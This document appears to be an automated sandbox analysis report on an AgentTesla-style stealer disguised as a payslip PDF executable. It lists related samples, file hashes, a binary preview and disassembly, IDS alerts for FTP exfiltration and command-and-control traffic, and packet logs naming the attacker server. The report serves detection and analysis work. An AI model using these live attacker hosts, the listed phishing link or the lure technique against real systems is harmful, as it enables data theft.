                                            Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            na.elfGet hashmaliciousMiraiBrowse
                                            • 203.142.6.25
                                            CLOUDFLARENETUSdebit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.3.144
                                            Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            Copia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.12.205
                                            SC16C750BIB64 PHILIPS 2000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            client1.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.168.106
                                            https://www.supercontable.es/emailing/track_superc.php?Destino=!:%7D%7D%7C.fasttravelnet.xyz/YW5kcmVzLnRvcmliaW9AY2VsbG5leHRlbGVjb20uY29t&IdTracking=9008&user=000000Get hashmaliciousPhisherBrowse
                                            • 104.17.25.14
                                            B6EGeOHEFm.exeGet hashmaliciousPhemedrone StealerBrowse
                                            • 104.26.1.100
                                            Q60ZbERXWZ.exeGet hashmaliciousPhemedrone StealerBrowse
                                            • 104.26.1.100
                                            nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                            • 104.26.1.100
                                            XCubQJqiz7.exeGet hashmaliciousPhemedrone StealerBrowse
                                            • 104.26.1.100

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://email.abprotector.com/c/eJwUzU2OrCAQAODTwE4DBc3PgsXbeA1TUuWTDDadBsfJnH7SB_jyUbIRYDeSk_ZGuQA6RHkkAJfRs995x93paDmToYhsSONmUJbkPARNlh5b9LiCecRgLQQvrAIm0OTdtG0WJ-uUnTYinBwhZ_ocIc4nliprOsZ4dWH-CVgELPd9z6_8v2Lv3OfcTgFL53y9mdbrt62v9h5YBSzlSfwzH-Os8p36WcbRbn5a9RBWtWvU1r4-XI5yci1PXgslbYwJwSvj5XeCvwAAAP__4WRNQg#c2VkZGlrLmJlbmFyYmlhQGF1Yi1zYW50ZS5mcg==Get hashmaliciousUnknownBrowse
                                            • 172.67.74.152
                                            Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            Copia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            SC16C750BIB64 PHILIPS 2000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 172.67.74.152
                                            B6EGeOHEFm.exeGet hashmaliciousPhemedrone StealerBrowse
                                            • 172.67.74.152
                                            Q60ZbERXWZ.exeGet hashmaliciousPhemedrone StealerBrowse
                                            • 172.67.74.152
                                            nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                            • 172.67.74.152
                                            XCubQJqiz7.exeGet hashmaliciousPhemedrone StealerBrowse
                                            • 172.67.74.152
                                            upd.ps1Get hashmaliciousPhemedrone StealerBrowse
                                            • 172.67.74.152
                                            WDSecureUtil.exeGet hashmaliciousPhemedrone StealerBrowse
                                            • 172.67.74.152

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payslip_October_2024_pdf.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sgxIb.exe.log

                                            Download File
                                            Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                            C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):780288
                                            Entropy (8bit):7.6529324185750145
                                            Encrypted:false
                                            SSDEEP:12288:Tlx7M0cl2LPU1ceS3UoWl8whrP9jltoinVaYt3u/32z0oBGg7QeKhZfmGt:LA0c+2SA6whr14kbt3fz0oBftK/f5
                                            MD5:0D4985C828F3F9F6974B1602C92EE962
                                            SHA1:0F11A5DEEF40A3DEC6CB8CB0CC6AE057BD56C2DD
                                            SHA-256:59CBE4E681C4371B18A5F6D457369560CE9E4F0EDA5A39DE1ACAB8B5BDF73BDA
                                            SHA-512:5EDA720231DEF9F8C7260DFB412AB753321338FD4A31E561F78A59445EEB63C92C547DC5A4145A3114B33DA022771D7EEB271FD5978D4696351B323F9AD9BB15
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 34%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G...............0.............v.... ........@.. .......................@............@.................................!...O............................ ......P...p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................U.......H.......P....~..........Xe...n..........................................&.(......*...0.............s.....+..*....0..3...........{....o........o......o.........,..o........+..*.........."......:..{....o.....*:..{....o.....*:..{....o.....*....0..l........s.....r...p...(......+4...rA..po.....rG..po.....r_..po....(....s....o.......o......-.....,..o.........+...*........DY.......0...........s ....ri..p.o.....?...(!....s........(....}.....+J.....(...........s"...o#....{....r...po..

                                            C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier

                                            Download File
                                            Process:C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.6529324185750145
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:Payslip_October_2024_pdf.exe
                                            File size:780'288 bytes
                                            MD5:0d4985c828f3f9f6974b1602c92ee962
                                            SHA1:0f11a5deef40a3dec6cb8cb0cc6ae057bd56c2dd
                                            SHA256:59cbe4e681c4371b18a5f6d457369560ce9e4f0eda5a39de1acab8b5bdf73bda
                                            SHA512:5eda720231def9f8c7260dfb412ab753321338fd4a31e561f78a59445eeb63c92c547dc5a4145a3114b33da022771d7eeb271fd5978d4696351b323f9ad9bb15
                                            SSDEEP:12288:Tlx7M0cl2LPU1ceS3UoWl8whrP9jltoinVaYt3u/32z0oBGg7QeKhZfmGt:LA0c+2SA6whr14kbt3fz0oBftK/f5
                                            TLSH:C8F4BEE03A767B1ADEA95BB09559DDB183F02969B004FAE65DD93BC7349C7009E08F03
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G................0.............v.... ........@.. .......................@............@................................

                                            File Icon

                                            Icon Hash:00928e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x4bfc76
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0xA7C547C1 [Wed Mar 12 19:47:13 2059 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            push ebx
                                            add byte ptr [ecx+00h], bh
                                            jnc 00007F548CEE2F12h
                                            je 00007F548CEE2F12h
                                            add byte ptr [ebp+00h], ch
                                            add byte ptr [ecx+00h], al
                                            arpl word ptr [eax], ax
                                            je 00007F548CEE2F12h
                                            imul eax, dword ptr [eax], 00610076h
                                            je 00007F548CEE2F12h
                                            outsd
                                            add byte ptr [edx+00h], dh
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbfc210x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x594.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xbd4500x70.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xbdc9c0xbde00631935b13bb35572cd75b81871249138False0.8473682315668203data7.659760721121941IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xc00000x5940x600c656935232eedc387a607a918ab6d6c0False0.4140625data4.025842667742365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xc20000xc0x20061e37f9e3cd1f0e6dfa6db6e84d930e5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0xc00900x304data0.4339378238341969
                                            RT_MANIFEST0xc03a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-11-04T10:13:19.167320+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549717TCP
                                            2024-11-04T10:13:19.381403+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.549716110.4.45.19721TCP
                                            2024-11-04T10:13:20.357961+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549722110.4.45.19761813TCP
                                            2024-11-04T10:13:20.363581+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549722110.4.45.19761813TCP
                                            2024-11-04T10:13:27.924804+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.549745110.4.45.19721TCP
                                            2024-11-04T10:13:28.852402+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549766110.4.45.19764083TCP
                                            2024-11-04T10:13:28.863602+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549766110.4.45.19764083TCP
                                            2024-11-04T10:13:58.256553+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549929TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 4, 2024 10:13:01.671607018 CET49706443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:01.671622038 CET44349706172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:01.671694994 CET49706443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:01.679464102 CET49706443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:01.679482937 CET44349706172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:02.291179895 CET44349706172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:02.291260958 CET49706443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:02.300559998 CET49706443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:02.300573111 CET44349706172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:02.300867081 CET44349706172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:02.352834940 CET49706443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:02.432604074 CET49706443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:02.475332975 CET44349706172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:02.611354113 CET44349706172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:02.611424923 CET44349706172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:02.611556053 CET49706443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:02.620316982 CET49706443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:03.460407019 CET4970821192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:03.466933012 CET2149708110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:03.467048883 CET4970821192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:03.471188068 CET4970821192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:03.478086948 CET2149708110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:03.478408098 CET4970821192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:03.505875111 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:03.512501955 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:03.512624025 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:04.461606026 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:04.461891890 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:04.466952085 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:04.824552059 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:04.827223063 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:04.832037926 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:05.222310066 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:05.222513914 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:05.227333069 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:05.580542088 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:05.580734015 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:05.585705996 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:05.936120987 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:05.936284065 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:05.941879034 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:06.294846058 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:06.295129061 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:06.300028086 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:06.650208950 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:06.650954008 CET4971253855192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:06.655807972 CET5385549712110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:06.655981064 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:06.655982018 CET4971253855192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:06.660856009 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:07.585129976 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:07.594105959 CET4971253855192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:07.594156981 CET4971253855192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:07.599097013 CET5385549712110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:07.599518061 CET5385549712110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:07.599577904 CET4971253855192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:07.634948015 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:07.941498995 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:07.942117929 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:07.946978092 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:08.297616005 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:08.298134089 CET4971349362192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:08.303066015 CET4936249713110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:08.303136110 CET4971349362192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:08.303241968 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:08.308128119 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:09.216640949 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:09.220038891 CET4971349362192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:09.225929976 CET4936249713110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:09.227768898 CET4971349362192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:09.274728060 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:09.561566114 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:09.561956882 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:09.566780090 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:09.917282104 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:09.917845011 CET4971462375192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:09.922812939 CET6237549714110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:09.922933102 CET4971462375192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:09.923052073 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:09.927804947 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:10.881580114 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:10.881820917 CET4971462375192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:10.887000084 CET6237549714110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:10.887059927 CET4971462375192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:10.930986881 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:11.250051975 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:11.290363073 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:14.564222097 CET49715443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:14.564256907 CET44349715172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:14.564332962 CET49715443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:14.567694902 CET49715443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:14.567708015 CET44349715172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:15.220114946 CET44349715172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:15.220242977 CET49715443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:15.285068989 CET49715443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:15.285085917 CET44349715172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:15.285403013 CET44349715172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:15.328852892 CET49715443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:15.559633970 CET49715443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:15.603336096 CET44349715172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:15.743804932 CET44349715172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:15.743870020 CET44349715172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:15.743964911 CET49715443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:15.746670008 CET49715443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:16.232513905 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:16.238100052 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:16.238217115 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:17.191484928 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:17.191725016 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:17.196718931 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:17.551525116 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:17.551703930 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:17.556844950 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:17.936074018 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:17.936476946 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:17.941629887 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:18.294068098 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:18.294240952 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:18.299438953 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:18.651875973 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:18.652288914 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:18.657196999 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:19.009896040 CET2149716110.4.45.197192.168.2.5
